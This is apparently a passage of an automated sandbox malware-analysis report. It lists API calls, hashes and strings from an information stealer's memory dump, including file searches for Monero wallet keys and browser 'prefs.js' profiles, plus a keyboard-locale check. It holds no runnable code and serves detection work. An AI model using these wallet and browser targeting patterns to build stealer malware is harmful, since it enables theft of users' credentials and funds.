                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                         • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 8d870de23b0c5d6305f75ebb088d4a83209aa93cf0ea228443eaf8a1c6f8401f
                        • Instruction ID: 32f342dd1b9ad183bc1108be727bdb32aac825b41747e6068d59b67589f91e2f
                        • Opcode Fuzzy Hash: 8d870de23b0c5d6305f75ebb088d4a83209aa93cf0ea228443eaf8a1c6f8401f
                        • Instruction Fuzzy Hash: 5A5166B69402189BD774EB70DC8CFED737CAB58300F404589F64A97188EB7497858F91
                        APIs
                        • wsprintfA.USER32 ref: 01013EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 01013EDA
                        • StrCmpCA.SHLWAPI(?,01020FAC), ref: 01013F08
                        • StrCmpCA.SHLWAPI(?,01020FB0), ref: 01013F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0101406C
                        • FindClose.KERNEL32(000000FF), ref: 01014081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                         • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 37bfc6ded9fdfa87e6bcfba560330fc0b65ebe5de491002abe070d162e337d4c
                        • Instruction ID: dd660f31ed6abd993c748daba537c7cbbb49136df51ba43b554485e1d0883808
                        • Opcode Fuzzy Hash: 37bfc6ded9fdfa87e6bcfba560330fc0b65ebe5de491002abe070d162e337d4c
                        • Instruction Fuzzy Hash: 175178B6940219ABDB25EBB0DC49EEA737CFB58300F04458CF69A97084DB75D7858F50
                        APIs
                        • wsprintfA.USER32 ref: 0100ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0100ED55
                        • StrCmpCA.SHLWAPI(?,01021538), ref: 0100EDAB
                        • StrCmpCA.SHLWAPI(?,0102153C), ref: 0100EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0100F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                         • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 5e7c9e16115b2bdfd56e1c891098b1fa90073b95dc4641f9a6e1257d335103e7
                        • Instruction ID: 0f54ec25a11d0a5f66e5aec30982ec5a4b10bd591364252a334815ea84737609
                        • Opcode Fuzzy Hash: 5e7c9e16115b2bdfd56e1c891098b1fa90073b95dc4641f9a6e1257d335103e7
                        • Instruction Fuzzy Hash: 22E12072A12159DAEB65FB60DD50EEE7338AF64210F4041D9B44B63095EF346F8ACF60
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010215B8,01020D96), ref: 0100F71E
                        • StrCmpCA.SHLWAPI(?,010215BC), ref: 0100F76F
                        • StrCmpCA.SHLWAPI(?,010215C0), ref: 0100F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0100FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                         • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 54601d50372d3bbbd8c82cf5ce634c6bb103b7a89554387571dc85ea24601a78
                        • Instruction ID: e1a7fae74fb81186c7c7304d73aa46ecd50d658477b8ee5e0f8a4e621d5fcba1
                        • Opcode Fuzzy Hash: 54601d50372d3bbbd8c82cf5ce634c6bb103b7a89554387571dc85ea24601a78
                        • Instruction Fuzzy Hash: 3DB17571A0115ADBDB25FF60DD54EED7379AF64300F4081A8E88A97184EF345B4ACF91
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0102510C,?,?,?,010251B4,?,?,00000000,?,00000000), ref: 01001923
                        • StrCmpCA.SHLWAPI(?,0102525C), ref: 01001973
                        • StrCmpCA.SHLWAPI(?,01025304), ref: 01001989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 01001D40
                        • DeleteFileA.KERNEL32(00000000), ref: 01001DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 01001E20
                        • FindClose.KERNEL32(000000FF), ref: 01001E32
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                         • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 49f5a700cc80263b50e4443f4af3f7929fc12beff1e986feaf9ec17efc20206d
                        • Instruction ID: 1144aecb851d7b4cc88f6f513f18842bdd0d2b449ac38a1626cb325c403a4d36
                        • Opcode Fuzzy Hash: 49f5a700cc80263b50e4443f4af3f7929fc12beff1e986feaf9ec17efc20206d
                        • Instruction Fuzzy Hash: F5129371A11159DBDB19FB60DC94EEE7379AF24310F4041D9A58A63094EF386F8ACFA0
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,01020C2E), ref: 0100DE5E
                        • StrCmpCA.SHLWAPI(?,010214C8), ref: 0100DEAE
                        • StrCmpCA.SHLWAPI(?,010214CC), ref: 0100DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0100E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: ddc54d9d090e9957daebabfe6492fc5d12d6f6fc9725e3edb9cd3e664892eabe
                        • Instruction ID: b79b6c8a9888012a17b0f26a359dbb509695600cd46b4b8d82f1a93ad950821f
                        • Opcode Fuzzy Hash: ddc54d9d090e9957daebabfe6492fc5d12d6f6fc9725e3edb9cd3e664892eabe
                        • Instruction Fuzzy Hash: 50F1AE75911159DADB25FB60DD94EEE7338BF24310F8041DAA48A63094EF346B8ACF60
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010214B0,01020C2A), ref: 0100DAEB
                        • StrCmpCA.SHLWAPI(?,010214B4), ref: 0100DB33
                        • StrCmpCA.SHLWAPI(?,010214B8), ref: 0100DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0100DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: ef5707f1b9ea52a1f167213ca36f48a00b6c9e9a3827da3c8ad2ae33f630e6a1
                        • Instruction ID: 3b04b89bb43d6c0828372973cfac19d497760f326d3d891261ddb6f854d43ee8
                        • Opcode Fuzzy Hash: ef5707f1b9ea52a1f167213ca36f48a00b6c9e9a3827da3c8ad2ae33f630e6a1
                        • Instruction Fuzzy Hash: 31917676A00105DBDB15FBB0ED59DED737DAFA4300F408558E88B97188EE389B0D8BA1
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,010205AF), ref: 01017BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 01017BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 01017C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 01017C62
                        • LocalFree.KERNEL32(00000000), ref: 01017D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: befce8d2369322696880ee062f0e5de3b3d61c79129f0a4dc8fda7934a4f3573
                        • Instruction ID: 9f56ccf0fd1bb9c2c10977a4bfe842523b6e46f9befcc23bd5f314f540745c23
                        • Opcode Fuzzy Hash: befce8d2369322696880ee062f0e5de3b3d61c79129f0a4dc8fda7934a4f3573
                        • Instruction Fuzzy Hash: DB414A7194121DEBDB24DB94DC98BEEB3B8FB58710F104199E50A67184DB382F86CFA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: AM9$AR>}$BM~{$UmG$o{~$vn/o$4JG
                        • API String ID: 0-4121454376
                        • Opcode ID: dbdbc6be15d3e8b47a46dc65830a870aecdc949fc04753f79a007b6cd93bc8be
                        • Instruction ID: 8064e8324ef79883837e0e8f10c17d63f8db6dbd173e3f292493f038114ac891
                        • Opcode Fuzzy Hash: dbdbc6be15d3e8b47a46dc65830a870aecdc949fc04753f79a007b6cd93bc8be
                        • Instruction Fuzzy Hash: A7B2E8F3A082049FE7046E2DEC8577ABBE9EF94720F16493DEAC4C3744EA3558058697
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,01020D73), ref: 0100E4A2
                        • StrCmpCA.SHLWAPI(?,010214F8), ref: 0100E4F2
                        • StrCmpCA.SHLWAPI(?,010214FC), ref: 0100E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 039535e8b037f00984876b9d5e61bcda6bbd7e3ee6ed6d0cde8785d6937c03de
                        • Instruction ID: 2305959cf50c5a2d895f6728f8a87590a18a7356c375549c73b17ae1674d29f7
                        • Opcode Fuzzy Hash: 039535e8b037f00984876b9d5e61bcda6bbd7e3ee6ed6d0cde8785d6937c03de
                        • Instruction Fuzzy Hash: 86128431A01159DBDB15FB60DD94EED7339AF64310F4045A9A58B67088EF386F8ACFA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
